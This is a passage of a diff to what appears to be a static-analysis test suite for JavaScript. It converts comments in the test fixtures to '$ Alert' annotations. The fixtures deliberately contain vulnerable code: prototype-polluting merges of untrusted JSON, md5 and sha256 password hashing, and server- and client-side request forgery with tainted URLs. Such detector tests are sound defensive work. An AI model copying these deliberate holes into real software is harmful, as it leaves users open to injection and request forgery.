map[key1][key2] = value; // $ Alert - object literal can flow here } function deepSetCallerBad(data) { @@ -254,7 +254,7 @@ function mergeWithCopy(dst, src) { let result = maybeCopy(dst); for (let key in src) { if (src.hasOwnProperty(key)) { - result[key] = mergeWithCopy(dst[key], src[key]); // OK + result[key] = mergeWithCopy(dst[key], src[key]); } } return result; @@ -267,7 +267,7 @@ function copyUsingEntries(dst, src) { if (dst[key]) { copyUsingEntries(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -277,7 +277,7 @@ function copyUsingReflect(dst, src) { if (dst[key]) { copyUsingReflect(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } @@ -290,7 +290,7 @@ function copyWithPath(dst, src, path) { } else { let target = {}; target[path] = {}; - target[path][key] = src[key]; // OK + target[path][key] = src[key]; doSomething(target); } } @@ -305,7 +305,7 @@ function typeofObjectTest(dst, src) { if (dst[key] && typeof value === 'object') { typeofObjectTest(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -319,7 +319,7 @@ function mergeRephinementNode(dst, src) { if (dst[key] && typeof value === 'object') { mergeRephinementNode(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -335,7 +335,7 @@ function mergeSelective(dst, src) { if (dst[key]) { mergeSelective(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -354,7 +354,7 @@ function mergePlainObjectsOnly(target, source) { if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnly(target[key], source[key], options); } else { - target[key] = source[key]; // OK - but flagged anyway due to imprecise barrier for captured variable + target[key] = source[key]; // $ SPURIOUS: Alert - due to imprecise barrier for captured variable } }); } @@ -370,7 +370,7 @@ function mergePlainObjectsOnlyNoClosure(target, source) { if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnlyNoClosure(target[key], source[key], options); } else { - target[key] = source[key]; // OK + target[key] = source[key]; } } } @@ -390,7 +390,7 @@ function mergeUsingCallback(dst, src) { if (dst[key]) { mergeUsingCallback(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK - but not currently flagged + dst[key] = src[key]; // $ MISSING: Alert } }); } @@ -400,7 +400,7 @@ function mergeUsingCallback2(dst, src) { if (dst[key]) { mergeUsingCallback2(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -416,7 +416,7 @@ function copyUsingWrappedRead(dst, src) { if (target) { copyUsingWrappedRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -433,7 +433,7 @@ function copyUsingAlmostSafeRead(dst, src) { if (target) { copyUsingAlmostSafeRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -450,7 +450,7 @@ function copyUsingSafeRead(dst, src) { if (target) { copyUsingSafeRead(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } @@ -462,9 +462,9 @@ function copyUsingForOwn(dst, src) { copyUsingForOwn(dst[key], src[key]); } else { // Handle a few different ways to access src[key] - if (something()) dst[key] = src[key]; // NOT OK - if (something()) dst[key] = o[key]; // NOT OK - if (something()) dst[key] = value; // NOT OK + if (something()) dst[key] = src[key]; // $ Alert + if (something()) dst[key] = o[key]; // $ Alert + if (something()) dst[key] = value; // $ Alert } }); } @@ -474,7 +474,7 @@ function copyUsingUnderscoreOrLodash(dst, src) { if (dst[key]) { copyUsingUnderscoreOrLodash(dst[key], src[key]); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -486,7 +486,7 @@ function copyPlainObject(dst, src) { if (dst[key] && isPlainObject(src)) { copyPlainObject(dst[key], src[key]); } else { - dst[key] = src[key]; // OK - but flagged anyway + dst[key] = src[key]; // $ SPURIOUS: Alert } } } @@ -499,7 +499,7 @@ function copyPlainObject2(dst, src) { if (isPlainObject(target) && isPlainObject(value)) { copyPlainObject2(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } @@ -514,7 +514,7 @@ function usingDefineProperty(dst, src) { } else { var descriptor = {}; descriptor.value = src[key]; - Object.defineProperty(dst, key, descriptor); // NOT OK + Object.defineProperty(dst, key, descriptor); // $ Alert } } } @@ -526,7 +526,7 @@ function copyUsingForInAndRest(...args) { if (dst[key]) { copyUsingForInAndRest(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -544,7 +544,7 @@ function mergeUsingCallback3(dst, src) { if (dst[key]) { mergeUsingCallback3(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -556,7 +556,7 @@ function copyHasOwnProperty2(dst, src) { if (Object.hasOwn(dst, key)) { copyHasOwnProperty2(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -568,7 +568,7 @@ function copyHasOwnProperty3(dst, src) { if (_.has(dst, key)) { copyHasOwnProperty3(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -602,7 +602,7 @@ function merge_captureBarrier(dest, source) { if (dest[key]) { merge_captureBarrier(dest[key], source[key]); } else { - dest[key] = captureBarrier(source[key]); // OK - but currently flagged anyway + dest[key] = captureBarrier(source[key]); // $ SPURIOUS: Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js index 041d9adf02fc..a8fdfde4f382 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js @@ -1,3 +1,3 @@ addEventListener("message", (event) => { - angular.merge({}, JSON.parse(event.data)); // NOT OK + angular.merge({}, JSON.parse(event.data)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js index ba7d026b9cd9..8e50da57e315 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js @@ -4,5 +4,5 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // OK + _.merge({}, req.query.foo); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js index b1da6d9ab05d..8111eb36d94a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js @@ -4,17 +4,17 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // NOT OK - _.merge({}, req.query); // NOT OK - but not flagged + _.merge({}, req.query.foo); // $ Alert + _.merge({}, req.query); // $ MISSING: Alert _.merge({}, { - value: req.query.value // NOT OK + value: req.query.value // $ Alert }); let opts = { thing: req.query.value // wrapped and unwrapped value }; _.merge({}, { - value: opts.thing // NOT OK + value: opts.thing // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html index 02d6d086d547..47c340cb8784 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html @@ -1,7 +1,7 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js index acbfa2acbb42..5b1b7a277081 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js @@ -1,6 +1,6 @@ import * as webix from "webix"; addEventListener("message", (event) => { - webix.extend({}, JSON.parse(event.data)); // NOT OK - webix.copy({}, JSON.parse(event.data)); // NOT OK + webix.extend({}, JSON.parse(event.data)); // $ Alert + webix.copy({}, JSON.parse(event.data)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-916/tst.js b/javascript/ql/test/query-tests/Security/CWE-916/tst.js index c5f1c31127a8..d41c6b719a18 100644 --- a/javascript/ql/test/query-tests/Security/CWE-916/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-916/tst.js @@ -1,9 +1,9 @@ var password = "secret"; -require("bcrypt").hash(password); // OK +require("bcrypt").hash(password); -require('crypto').createCipher('aes192').write(password); // NOT OK +require('crypto').createCipher('aes192').write(password); // $ Alert -require('crypto').createHash('sha256').write(password); // NOT OK +require('crypto').createHash('sha256').write(password); // $ Alert -require('crypto').createHash('md5').write(password); // NOT OK +require('crypto').createHash('md5').write(password); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js index c55270377ede..a8d7d429cf86 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js @@ -9,17 +9,17 @@ export function MyComponent() { request(params.foo); // Possibly problematic, but not currently flagged. const query = window.location.search.substring(1); - request('https://example.com/api/' + query + '/id'); // NOT OK - request('https://example.com/api?q=' + query); // OK + request('https://example.com/api/' + query + '/id'); // $ Alert[js/client-side-request-forgery] + request('https://example.com/api?q=' + query); request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway const fragment = window.location.hash.substring(1); - request('https://example.com/api/' + fragment + '/id'); // NOT OK - request('https://example.com/api?q=' + fragment); // OK + request('https://example.com/api/' + fragment + '/id'); // $ Alert[js/client-side-request-forgery] + request('https://example.com/api?q=' + fragment); const name = window.name; - request('https://example.com/api/' + name + '/id'); // NOT OK - request('https://example.com/api?q=' + name); // OK + request('https://example.com/api/' + name + '/id'); // $ Alert[js/client-side-request-forgery] + request('https://example.com/api?q=' + name); - request(window.location.href + '?q=123'); // OK + request(window.location.href + '?q=123'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 7b4c792bb366..50a7fe976998 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js @@ -13,40 +13,40 @@ let Uri = goog.require('goog.Uri'); var server = http.createServer(function(req, res) { var tainted = url.parse(req.url, true).query.url; - request("example.com"); // OK + request("example.com"); - request(tainted); // NOT OK + request(tainted); // $ Alert[js/request-forgery] - request.get(tainted); // NOT OK + request.get(tainted); // $ Alert[js/request-forgery] var options = {}; - options.url = tainted; // NOT OK + options.url = tainted; // $ Alert request(options); - request("http://" + tainted); // NOT OK + request("http://" + tainted); // $ Alert[js/request-forgery] - request("http://example.com" + tainted); // NOT OK + request("http://example.com" + tainted); // $ Alert[js/request-forgery] - request("http://example.com/" + tainted); // NOT OK + request("http://example.com/" + tainted); // $ Alert[js/request-forgery] - request("http://example.com/?" + tainted); // OK + request("http://example.com/?" + tainted); - http.get(relativeUrl, {host: tainted}); // NOT OK + http.get(relativeUrl, {host: tainted}); // $ Alert[js/request-forgery] - XhrIo.send(new Uri(tainted)); // NOT OK - new XhrIo().send(new Uri(tainted)); // NOT OK + XhrIo.send(new Uri(tainted)); // $ Alert[js/request-forgery] + new XhrIo().send(new Uri(tainted)); // $ Alert[js/request-forgery] let base = require('./config').base; - request(`http://example.com/${base}/${tainted}`); // NOT OK + request(`http://example.com/${base}/${tainted}`); // $ Alert[js/request-forgery] - request(`http://example.com/${base}/v1/${tainted}`); // NOT OK + request(`http://example.com/${base}/v1/${tainted}`); // $ Alert[js/request-forgery] - request('http://example.com/' + base + '/' + tainted); // NOT OK + request('http://example.com/' + base + '/' + tainted); // $ Alert[js/request-forgery] - request('http://example.com/' + base + ('/' + tainted)); // NOT OK - but not flagged [INCONSISTENCY] + request('http://example.com/' + base + ('/' + tainted)); // $ MISSING: Alert - request(`http://example.com/?${base}/${tainted}`); // OK + request(`http://example.com/?${base}/${tainted}`); request(`http://example.com/${base}${tainted}`); // OK - assumed safe @@ -58,14 +58,14 @@ var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; var client = await CDP(options); - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] CDP(options).catch((ignored) => {}).then((client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] }) CDP(options, (client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] }); }) @@ -73,7 +73,7 @@ import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; - JSDOM.fromURL(tainted); // NOT OK + JSDOM.fromURL(tainted); // $ Alert[js/request-forgery] }); var route = require('koa-route'); @@ -81,15 +81,15 @@ var Koa = require('koa'); var app = new Koa(); app.use(route.get('/pets', (context, param1, param2, param3) => { - JSDOM.fromURL(param1); // NOT OK + JSDOM.fromURL(param1); // $ Alert[js/request-forgery] })); const router = require('koa-router')(); const app = new Koa(); router.get('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] }).post('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] }); app.use(router.routes()); @@ -97,7 +97,7 @@ import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; - new WebSocket(tainted); // NOT OK + new WebSocket(tainted); // $ Alert[js/request-forgery] }); @@ -124,12 +124,12 @@ var server2 = http.createServer(function(req, res) { axios({ method: 'get', - url: tainted // NOT OK + url: tainted // $ Alert }) var myUrl = `${something}/bla/${tainted}`; - axios.get(myUrl); // NOT OK + axios.get(myUrl); // $ Alert[js/request-forgery] var myEncodedUrl = `${something}/bla/${encodeURIComponent(tainted)}`; - axios.get(myEncodedUrl); // OK + axios.get(myEncodedUrl); }) \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js index 1b66865ea21c..683ca49fcafb 100644 --- a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js +++ b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js @@ -1,5 +1,4 @@ -// NOT OK -while(c){ +while(c){ // $ Alert switch(c){ case "/": break; @@ -8,8 +7,7 @@ while(c){ break; } -// NOT OK -function f() { +function f() { // $ Alert for (; k < numprecincts;) { var packet = createPacket(resolution, k, l); k++; @@ -17,14 +15,14 @@ function f() { } } -// OK + var oHasProps = false; for (var p in o) { oHasProps = true; break; } -// OK + while(c){ if (c === '"') break; diff --git a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js index 47efe8c1cb6c..adbd85cf6157 100644 --- a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js +++ b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js @@ -1,8 +1,8 @@ var arr = [1,2,3]; -arr.concat([1,2,3]); // NOT OK! +arr.concat([1,2,3]); // $ Alert -arr.concat(arr); // NOT OK! +arr.concat(arr); // $ Alert console.log(arr.concat([1,2,3])); diff --git a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js index 114db4ed8d3e..35338b7bed10 100644 --- a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js +++ b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js @@ -1,17 +1,16 @@ -// NOT OK -function f() { +function f() { // $ Alert if (foo()) return true; } -// OK + function g() { if (foo()) return true; return false; } -// OK + function h() { open(); try { @@ -21,7 +20,7 @@ function h() { } } -// OK + function k(x) { switch (x) { case 1: @@ -31,20 +30,20 @@ function k(x) { } } -// OK + function l() { return 23; alert("Hi"); } -// OK + function m() { if (foo()) return true; throw new Error("not foo!"); } -// OK + function n() { if (foo()) return true; @@ -60,7 +59,7 @@ function foo() { } // -// OK: dual-use constructor +// OK - dual-use constructor function Point(x, y) { if (!(this instanceof Point)) return new Point(x, y); @@ -68,7 +67,7 @@ function Point(x, y) { this.y = y; } -// OK: infinite loops +// OK - infinite loops function q(n) { for (var i=0;;++i) if (i>2*n) @@ -96,14 +95,12 @@ function t(n) { } while("true"); } -// NOT OK -var u = function() { +var u = function() { // $ Alert if (foo()) return true; }; -// NOT OK -function v(b) { +function v(b) { // $ Alert if (b) return 1; } diff --git a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js index f2331a705bdf..990179e6200a 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js +++ b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js @@ -1,19 +1,16 @@ -// OK + for (j = i - 1; j >= 0; --j) { } -// NOT OK -for (j = i + 1; j < strLength; --j) { +for (j = i + 1; j < strLength; --j) { // $ Alert } -// NOT OK -for (var i = 0, l = c.length; i > l; i ++) { +for (var i = 0, l = c.length; i > l; i ++) { // $ Alert } -// OK + for (i=lower-1; i>=0; --i) a[i] = 0; -// NOT OK -for (i=upper+1; i5; --i) + for (var j=i; i>5; --i) // $ Alert f(i, j); - // OK + for (var k=0; k Foo
Click me
-
Click me
+
Click me
\ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js index 7b9968115f5e..7f4296932d96 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js @@ -17,17 +17,17 @@ console.log(returnsValue()) console.log(stub()) - console.log(onlySideEffects()); // Not OK! + console.log(onlySideEffects()); // $ Alert - var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK! A is never used. + var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK - A is never used. var b = onlySideEffects(); console.log(b); - var c = 42 + (onlySideEffects(), 42); // OK, value is thrown away. + var c = 42 + (onlySideEffects(), 42); // OK - value is thrown away. console.log(c); - var d = 42 + (42, onlySideEffects()); // NOT OK! + var d = 42 + (42, onlySideEffects()); // $ Alert console.log(d); if (onlySideEffects()) { @@ -42,7 +42,7 @@ onlySideEffects: onlySideEffects } - var e = myObj.onlySideEffects.apply(this, arguments); // NOT OK! + var e = myObj.onlySideEffects.apply(this, arguments); // $ Alert console.log(e); function onlySideEffects2() { @@ -50,11 +50,11 @@ } var bothOnlyHaveSideEffects = Math.random() > 0.5 ? onlySideEffects : onlySideEffects2; - var f = bothOnlyHaveSideEffects(); // NOT OK! + var f = bothOnlyHaveSideEffects(); // $ Alert console.log(f); var oneOfEach = Math.random() > 0.5 ? onlySideEffects : returnsValue; - var g = oneOfEach(); // OK + var g = oneOfEach(); console.log(g); function alwaysThrows() { @@ -66,28 +66,28 @@ throw new Error("Important error!") } - var h = returnsValue() || alwaysThrows(); // OK! + var h = returnsValue() || alwaysThrows(); console.log(h); function equals(x, y) { return x === y; } - var foo = [1,2,3].filter(n => {equals(n, 3)}) // NOT OK! + var foo = [1,2,3].filter(n => {equals(n, 3)}) // $ Alert console.log(foo); import { filter } from 'lodash' - var bar = filter([1,2,4], x => { equals(x, 3) } ) // NOT OK! + var bar = filter([1,2,4], x => { equals(x, 3) } ) // $ Alert console.log(bar); - var baz = [1,2,3].filter(n => {n === 3}) // OK + var baz = [1,2,3].filter(n => {n === 3}) console.log(baz); class Deferred { } - new Deferred().resolve(onlySideEffects()); // OK + new Deferred().resolve(onlySideEffects()); Promise.all([onlySideEffects(), onlySideEffects()]) })(); @@ -104,16 +104,16 @@ class Foo { class Bar extends Foo { constructor() { - console.log(super()); // OK. + console.log(super()); } } () => { let equals = (x, y) => { return x === y; }; - var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // $ Alert console.log(foo); - var foo = [1,2,3].findLast(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLast(n => { equals(n, 3); }) // $ Alert console.log(foo); } diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts index 6da3bde4bf01..758b4480c64e 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts @@ -3,4 +3,4 @@ declare function returnsSomething(): number; console.log(returnsSomething()); -console.log(returnsVoid()); // NOT OK! \ No newline at end of file +console.log(returnsVoid()); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js index aa5ee0e1fb5b..dd0468451930 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js @@ -1,4 +1,4 @@ function f() { - if (1 > 2) {} else {} // NOT OK - always false - if (1 > 0) {} else {} // NOT OK - always true + if (1 > 2) {} else {} // $ Alert - always false + if (1 > 0) {} else {} // $ Alert - always true } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js index a40fc483a06c..f16d5a000a22 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js @@ -1,11 +1,11 @@ function defaultParam(param = 0) { - if (param > 0) {} // OK + if (param > 0) {} } function defaultPattern(obj, arr) { let { prop = 0 } = obj; - if (prop > 0) {} // OK + if (prop > 0) {} let [ elm = 0 ] = arr; - if (elm > 0) {} // OK + if (elm > 0) {} } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js index 7e198d0e0293..a8064ae69429 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js @@ -2,5 +2,5 @@ function test() { let x = (function() { if (g) return 5; })(); - if (x + 1 < 5) {} // OK + if (x + 1 < 5) {} } diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index fe4bb6486ce0..d698b7d1c29e 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -30,7 +30,7 @@ function test(a, b) { if ((new X())){} x = 0n; - if (x) // NOT OK + if (x) // $ Alert ; } @@ -40,7 +40,7 @@ async function awaitFlow(){ if (y) v = await f() - if (v) { // OK + if (v) { } } @@ -57,29 +57,29 @@ async function awaitFlow(){ var unknown = unknownF(); if (unknown) return; - if (unknown) // NOT OK + if (unknown) // $ Alert return; }); (function (...x) { - x || y // NOT OK + x || y // $ Alert }); (function() { function f1(x) { - x || y // NOT OK, but whitelisted + x || y // $ Alert - but whitelisted } f1(true); function f2(x) { while (true) - x || y // NOT OK + x || y // $ Alert } f2(true); function f3(x) { (function(){ - x || y // NOT OK, but whitelisted + x || y // $ Alert - but whitelisted }); } f3(true); @@ -91,52 +91,52 @@ async function awaitFlow(){ (function (x, y) { if (!x) { - while (x) { // NOT OK + while (x) { // $ Alert f(); } - while (true) { // OK + while (true) { break; } - if (true && true) {} // NOT OK - if (y && x) {} // NOT OK - if (y && (x)) {} // NOT OK - do { } while (x); // NOT OK + if (true && true) {} // $ Alert + if (y && x) {} // $ Alert + if (y && (x)) {} // $ Alert + do { } while (x); // $ Alert } }); (function(x,y) { - let obj = (x && {}) || y; // OK - if ((x && {}) || y) {} // NOT OK + let obj = (x && {}) || y; + if ((x && {}) || y) {} // $ Alert }); (function(){ function constantFalse1() { return false; } - if (constantFalse1()) // OK + if (constantFalse1()) return; function constantFalse2() { return false; } let constantFalse = unknown? constantFalse1 : constantFalse2; - if (constantFalse2()) // OK + if (constantFalse2()) return; function constantUndefined() { return undefined; } - if (constantUndefined()) // NOT OK + if (constantUndefined()) // $ Alert return; function constantFalseOrUndefined1() { return unknown? false: undefined; } - if (constantFalseOrUndefined1()) // NOT OK + if (constantFalseOrUndefined1()) // $ Alert return; let constantFalseOrUndefined2 = unknown? constantFalse1 : constantUndefined; - if (constantFalseOrUndefined2()) // NOT OK + if (constantFalseOrUndefined2()) // $ Alert return; }); @@ -145,12 +145,12 @@ async function awaitFlow(){ function p() { return {}; } - if (p()) { // NOT OK + if (p()) { // $ Alert } var v = p(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ Alert - but not detected due to SSA limitations } }); @@ -160,12 +160,12 @@ async function awaitFlow(){ if (e) return e; throw new Error(); } - if(findOrThrow()){ // NOT OK + if(findOrThrow()){ // $ Alert } var v = findOrThrow(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ Alert - but not detected due to SSA limitations } }); @@ -173,14 +173,14 @@ async function awaitFlow(){ function f(){ return { v: unkown };} f(); var { v } = f(); - if (v) { // OK + if (v) { } }); (function() { function outer(x) { addEventListener("click", () => { - if (!x && something()) { // NOT OK, but whitelisted + if (!x && something()) { // $ Alert - but whitelisted something(); } }); diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js index 7b3888c982a4..74e2c0f2439f 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js @@ -11,90 +11,90 @@ function getLastLine(input) { function f1() { return false } - if(f1()){} // OK, whitelisted + if(f1()){} // OK - whitelisted function f2() { return false } - if(!f2()){} // OK, whitelisted + if(!f2()){} // OK - whitelisted function f3() { return false } - if(!!f3()){} // OK, whitelisted + if(!!f3()){} // OK - whitelisted function f4() { return false } - if(f4() || o.p){} // OK, whitelisted + if(f4() || o.p){} // OK - whitelisted function f5() { return false } var v5 = f5(); - if(v5){} // OK, whitelisted + if(v5){} // OK - whitelisted function f6() { return false } var v6 = f6(); - if(!!v6){} // OK, whitelisted + if(!!v6){} // OK - whitelisted })(); (function tooGeneralFunctions(){ function f1(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f1(undefined); f1({}); function f2(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f2(undefined); function f3(x1) { var x2 = x1; - if(x2){} // NOT OK, not whitelisted + if(x2){} // $ Alert - not whitelisted } f3(undefined); function f4(x) { - if(x && o.p){} // OK, whitelisted + if(x && o.p){} // OK - whitelisted } f4(undefined); function f5(x, y) { var xy = o.q? x: y; - if(xy && o.p){} // NOT OK, not whitelisted + if(xy && o.p){} // $ Alert - not whitelisted } f5(undefined, undefined); function f6(x) { - if(!x){} // OK, whitelisted + if(!x){} // OK - whitelisted } f6(true); function f7(x) { - if(!!x){} // OK, whitelisted + if(!!x){} // OK - whitelisted } f7(true); function f8(x, y) { var xy = x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f8(undefined, undefined); function f9(x, y) { var xy = !x || y; - if(xy){} // OK, whitelisted + if(xy){} // OK - whitelisted } f9(undefined, undefined); function f10(x, y) { var xy = !!x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f10(undefined, undefined); @@ -103,7 +103,7 @@ function getLastLine(input) { (function(){ function g(p) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted g(p); } }; @@ -111,7 +111,7 @@ function getLastLine(input) { function f(p = false) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted f(p); } }; @@ -119,7 +119,7 @@ function getLastLine(input) { function h(p = false) { (function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted } }); diff --git a/javascript/ql/test/query-tests/Vue/tst.js b/javascript/ql/test/query-tests/Vue/tst.js index 27fe31488cbf..f0889596112a 100644 --- a/javascript/ql/test/query-tests/Vue/tst.js +++ b/javascript/ql/test/query-tests/Vue/tst.js @@ -1,16 +1,16 @@ let Vue = 